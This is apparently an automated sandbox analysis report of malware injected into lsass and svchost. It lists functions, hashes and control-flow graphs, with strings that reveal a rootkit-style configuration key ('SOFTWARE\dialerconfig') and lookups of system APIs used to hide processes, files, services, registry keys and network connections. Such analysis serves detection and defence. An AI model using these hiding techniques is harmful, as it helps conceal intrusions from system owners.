                                                          • Instruction Fuzzy Hash: DD112A32750F419AEB40CF60EC553BD33A4F719758F482E22EA6D467A5DBB9C1A88380
                                                          Function 00000161C7349E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 76bd487c8ccf5bb20d94393abbe7c4c7d0c7e7230813ed8e28b57fc318ec45aa
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 38619F3B605B849AEB28DF65D8403ED7FA0F348B88F085215EF4917B98DBBAD195C704
                                                          Function 00000161C7372330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: a250803cf08791c6d4527b196589db3466640cbc80cfd0ca8b59d852463c0c18
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: 32511532284391A1E634CE2AAE583FEE7B1F385790F8CA125DE4903B49DEBBC544C744
                                                          Function 00000161C73826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: d041c4e42818bfef7b9de41f8d769f8c534c25d782df681eb6a75efff11c616e
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: 1B41B372315A80A6EB60CF25EC443EEB7A0F798794F589022EE4D87795EBBDC441C744
                                                          Function 00000161C73794A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: bc47e48fdd15aac664e22478a01496cc2b6b1a9a64ee437df53a8e5d83293aa4
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: F9114932204B8492EB21CB25E9002ADBBE0F788B94F595221EA8C07769DF79C551CB00
                                                          Function 00000161C7347356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: ef16c4ce3db8ea52da0ba1a99d78d32037ba3615539c6f5f8d27eb941ede3277
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: 40E08671680B44A0DF01CF62EC502EC33A1EB58B64B4CA1229D5C06311FA7CD1E9C310
                                                          Function 00000161C73473B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: c7307d63f35d137b9b2950ce79f400c73bba59fed141895c1e75f41b812d7f46
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: 54E08671640B4490DF01CF61D8501EC7361EB58B54B8CA122CD4C06311EA7CE1E5C310
                                                          Function 00000161C7371BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: 0daab7b4b461fbf8e9a16445719e951ea43809d07767578da2878eb082de553e
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: CC11BF36701B4491EA04CB66A9042BDB3A0FBC8FC0F0C6029CE8D43766DEBAC442C300
                                                          Function 00000161C7371268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction ID: 24e55b9d423b8a1e6b453433d5ded38a721d37325184f197b7926fa492a53efd
                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                          • Instruction Fuzzy Hash: 73E03935741604C6EB04CB62D8083AA36E1EB89F06F08902489090B352EFBE8499C750

                                                          Execution Graph

                                                          Execution Coverage:0.7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:66
                                                          Total number of Limit Nodes:2
                                                          execution_graph 14723 233b91b273c 14725 233b91b276a 14723->14725 14724 233b91b2858 LoadLibraryA 14724->14725 14725->14724 14726 233b91b28d4 14725->14726 14727 233b91e1abc 14732 233b91e1628 GetProcessHeap HeapAlloc 14727->14732 14729 233b91e1acb 14730 233b91e1ad2 Sleep SleepEx 14729->14730 14731 233b91e1598 StrCmpIW StrCmpW 14729->14731 14730->14729 14731->14729 14776 233b91e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14732->14776 14734 233b91e1650 14777 233b91e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14734->14777 14736 233b91e1661 14778 233b91e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14736->14778 14738 233b91e166a 14779 233b91e1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14738->14779 14740 233b91e1673 14741 233b91e168e RegOpenKeyExW 14740->14741 14742 233b91e16c0 RegOpenKeyExW 14741->14742 14743 233b91e18a6 14741->14743 14744 233b91e16ff RegOpenKeyExW 14742->14744 14745 233b91e16e9 14742->14745 14743->14729 14747 233b91e173a RegOpenKeyExW 14744->14747 14748 233b91e1723 14744->14748 14780 233b91e12bc RegQueryInfoKeyW 14745->14780 14751 233b91e175e 14747->14751 14752 233b91e1775 RegOpenKeyExW 14747->14752 14789 233b91e104c RegQueryInfoKeyW 14748->14789 14754 233b91e12bc 16 API calls 14751->14754 14755 233b91e17b0 RegOpenKeyExW 14752->14755 14756 233b91e1799 14752->14756 14759 233b91e176b RegCloseKey 14754->14759 14757 233b91e17eb RegOpenKeyExW 14755->14757 14758 233b91e17d4 14755->14758 14760 233b91e12bc 16 API calls 14756->14760 14763 233b91e180f 14757->14763 14764 233b91e1826 RegOpenKeyExW 14757->14764 14762 233b91e12bc 16 API calls 14758->14762 14759->14752 14761 233b91e17a6 RegCloseKey 14760->14761 14761->14755 14765 233b91e17e1 RegCloseKey 14762->14765 14766 233b91e104c 6 API calls 14763->14766 14767 233b91e1861 RegOpenKeyExW 14764->14767 14768 233b91e184a 14764->14768 14765->14757 14769 233b91e181c RegCloseKey 14766->14769 14771 233b91e189c RegCloseKey 14767->14771 14772 233b91e1885 14767->14772 14770 233b91e104c 6 API calls 14768->14770 14769->14764 14773 233b91e1857 RegCloseKey 14770->14773 14771->14743 14774 233b91e104c 6 API calls 14772->14774 14773->14767 14775 233b91e1892 RegCloseKey 14774->14775 14775->14771 14776->14734 14777->14736 14778->14738 14779->14740 14781 233b91e148a RegCloseKey 14780->14781 14782 233b91e1327 GetProcessHeap HeapAlloc 14780->14782 14781->14744 14783 233b91e1352 RegEnumValueW 14782->14783 14784 233b91e1476 GetProcessHeap HeapFree 14782->14784 14785 233b91e13a5 14783->14785 14784->14781 14785->14783 14785->14784 14787 233b91e141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14785->14787 14788 233b91e13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14785->14788 14794 233b91e152c 14785->14794 14787->14785 14788->14787 14790 233b91e11b5 RegCloseKey 14789->14790 14792 233b91e10bf 14789->14792 14790->14747 14791 233b91e10cf RegEnumValueW 14791->14792 14792->14790 14792->14791 14793 233b91e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14792->14793 14793->14792 14795 233b91e157c 14794->14795 14796 233b91e1546 14794->14796 14795->14785 14796->14795 14797 233b91e155d StrCmpIW 14796->14797 14798 233b91e1565 StrCmpW 14796->14798 14797->14796 14798->14796

                                                          Executed Functions

                                                          Function 00000233B91E328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction ID: 0249b026989b0e987fe973b6e47245db77992f0067a5d081fa831d913bb3bbb9
                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                          • Instruction Fuzzy Hash: E1119231B10A4E8BFB62EB21F84DB69E2B7BB5474CF504129A94685595EF7CC349E200
                                                          Function 00000233B91E1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000233B91E1628: GetProcessHeap.KERNEL32 ref: 00000233B91E1633
                                                            • Part of subcall function 00000233B91E1628: HeapAlloc.KERNEL32 ref: 00000233B91E1642
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E16B2
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E16DF
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E16F9
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1719
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E1734
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1754
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E176F
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E178F
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E17AA
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E17CA
                                                          • Sleep.KERNEL32 ref: 00000233B91E1AD7
                                                          • SleepEx.KERNELBASE ref: 00000233B91E1ADD
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E17E5
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1805
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E1820
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E1840
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E185B
                                                            • Part of subcall function 00000233B91E1628: RegOpenKeyExW.ADVAPI32 ref: 00000233B91E187B
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E1896
                                                            • Part of subcall function 00000233B91E1628: RegCloseKey.ADVAPI32 ref: 00000233B91E18A0
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1534210851-0
                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction ID: b0e4542f1565af9ef17f56bba554dee1379d3060ef70cb2d7b21315ca4479c90
                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                          • Instruction Fuzzy Hash: BE31E365600E4D4DFF50DB26DA493B993B7AB44BCCF1894219E098B6D5FF1CC751E210
                                                          Function 00000233B91E3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 57 233b91e3844-233b91e384f 58 233b91e3851-233b91e3864 StrCmpNIW 57->58 59 233b91e3869-233b91e3870 57->59 58->59 60 233b91e3866 58->60 60->59
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                          • Instruction ID: d6237fdfea50de11ad52e544c9cd91ef514d916bb6d9a24ef3a3210a6a5121f5
                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                          • Instruction Fuzzy Hash: 77D0A76031164D8BFF14DFA688CCB60A372EB0474CF884124C90001150DB1C8B8EF710
                                                          Function 00000233B91B273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: d9f59478894675c52c3d279e96fcac3622315c9c1eea2ba40dfa8b74dad7faa9
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: 6B61EF32B016A087EB54CF15D048729B3A3FB64BA8F588925DE5D07788DA3CDB5BE700

                                                          Non-executed Functions

                                                          Function 00000233B91E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 357 233b91e2b2c-233b91e2ba5 call 233b9202ce0 360 233b91e2ee0-233b91e2f03 357->360 361 233b91e2bab-233b91e2bb1 357->361 361->360 362 233b91e2bb7-233b91e2bba 361->362 362->360 363 233b91e2bc0-233b91e2bc3 362->363 363->360 364 233b91e2bc9-233b91e2bd9 GetModuleHandleA 363->364 365 233b91e2bed 364->365 366 233b91e2bdb-233b91e2beb GetProcAddress 364->366 367 233b91e2bf0-233b91e2c0e 365->367 366->367 367->360 369 233b91e2c14-233b91e2c33 StrCmpNIW 367->369 369->360 370 233b91e2c39-233b91e2c3d 369->370 370->360 371 233b91e2c43-233b91e2c4d 370->371 371->360 372 233b91e2c53-233b91e2c5a 371->372 372->360 373 233b91e2c60-233b91e2c73 372->373 374 233b91e2c75-233b91e2c81 373->374 375 233b91e2c83 373->375 376 233b91e2c86-233b91e2c8a 374->376 375->376 377 233b91e2c8c-233b91e2c98 376->377 378 233b91e2c9a 376->378 379 233b91e2c9d-233b91e2ca7 377->379 378->379 380 233b91e2d9d-233b91e2da1 379->380 381 233b91e2cad-233b91e2cb0 379->381 382 233b91e2ed2-233b91e2eda 380->382 383 233b91e2da7-233b91e2daa 380->383 384 233b91e2cc2-233b91e2ccc 381->384 385 233b91e2cb2-233b91e2cbf call 233b91e199c 381->385 382->360 382->373 386 233b91e2dbb-233b91e2dc5 383->386 387 233b91e2dac-233b91e2db8 call 233b91e199c 383->387 389 233b91e2d00-233b91e2d0a 384->389 390 233b91e2cce-233b91e2cdb 384->390 385->384 392 233b91e2dc7-233b91e2dd4 386->392 393 233b91e2df5-233b91e2df8 386->393 387->386 396 233b91e2d0c-233b91e2d19 389->396 397 233b91e2d3a-233b91e2d3d 389->397 390->389 395 233b91e2cdd-233b91e2cea 390->395 392->393 401 233b91e2dd6-233b91e2de3 392->401 402 233b91e2dfa-233b91e2e03 call 233b91e1bbc 393->402 403 233b91e2e05-233b91e2e12 lstrlenW 393->403 404 233b91e2ced-233b91e2cf3 395->404 396->397 405 233b91e2d1b-233b91e2d28 396->405 399 233b91e2d3f-233b91e2d49 call 233b91e1bbc 397->399 400 233b91e2d4b-233b91e2d58 lstrlenW 397->400 399->400 413 233b91e2d93-233b91e2d98 399->413 408 233b91e2d7b-233b91e2d8d call 233b91e3844 400->408 409 233b91e2d5a-233b91e2d64 400->409 410 233b91e2de6-233b91e2dec 401->410 402->403 421 233b91e2e4a-233b91e2e55 402->421 414 233b91e2e35-233b91e2e3f call 233b91e3844 403->414 415 233b91e2e14-233b91e2e1e 403->415 412 233b91e2cf9-233b91e2cfe 404->412 404->413 406 233b91e2d2b-233b91e2d31 405->406 406->413 416 233b91e2d33-233b91e2d38 406->416 408->413 424 233b91e2e42-233b91e2e44 408->424 409->408 419 233b91e2d66-233b91e2d79 call 233b91e152c 409->419 420 233b91e2dee-233b91e2df3 410->420 410->421 412->389 412->404 413->424 414->424 415->414 425 233b91e2e20-233b91e2e33 call 233b91e152c 415->425 416->397 416->406 419->408 419->413 420->393 420->410 428 233b91e2ecc-233b91e2ed0 421->428 429 233b91e2e57-233b91e2e5b 421->429 424->382 424->421 425->414 425->421 428->382 433 233b91e2e5d-233b91e2e61 429->433 434 233b91e2e63-233b91e2e7d call 233b91e85c0 429->434 433->434 436 233b91e2e80-233b91e2e83 433->436 434->436 439 233b91e2e85-233b91e2ea3 call 233b91e85c0 436->439 440 233b91e2ea6-233b91e2ea9 436->440 439->440 440->428 441 233b91e2eab-233b91e2ec9 call 233b91e85c0 440->441 441->428
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: a62f6b729a839c30a7c6b9472c7f3619017ef21d4c43acbf2ecc3871dc0d6498
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: 99B1AE22210E988AEB69CF25D5687A9E3B6FB48B8CF445416EE0957794DF7CCF40E340
                                                          Function 00000233B91E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: 6a49390ac4186b0d09badb68000a5c3b169e5056149d295ae2c98a4268ba074b
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: B3312A76205B888AEB60DF60E8847EDB376F784748F44442ADA4E57A99EF3CC748D710
                                                          Function 00000233B91ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: 13e12b5c491d003721c2b951e30812b63bfb6688144786945f12dc8a497a372a
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: FB313B36214F888AEB60CB25E84439EB3B5F789798F500126EA9D47BA5DF3CC755CB00
                                                          Function 00000233B91E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 106492572-2879589442
                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction ID: 4c7ea1fdbc954a0c528fced4c50d43f10972a04f201023d03bd9159e6acd7f61
                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                          • Instruction Fuzzy Hash: D2711836210E598AEB10DF25E898B99A3B6FB88B8CF405111DE4E47B69DF3CC744E344
                                                          Function 00000233B91E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: db8bf314992e469471c7fccb4184b1557f222152d6188e3dfd1581cdd059f8f0
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: C4515976204B888AEB51CF62E44839AB7B2F789FD9F048124DA4A07759DF3CC749DB00
                                                          Function 00000233B91E1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: 250135c64fcb793b22b62c69b1aa0b2731c2606ec98bbda66b2440d8ec3c55f8
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: A631E268600E8EA4FE01EF65E8697E4E333B70434CFC2541394690A1769F7C834EE3A0
                                                          Function 00000233B91B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

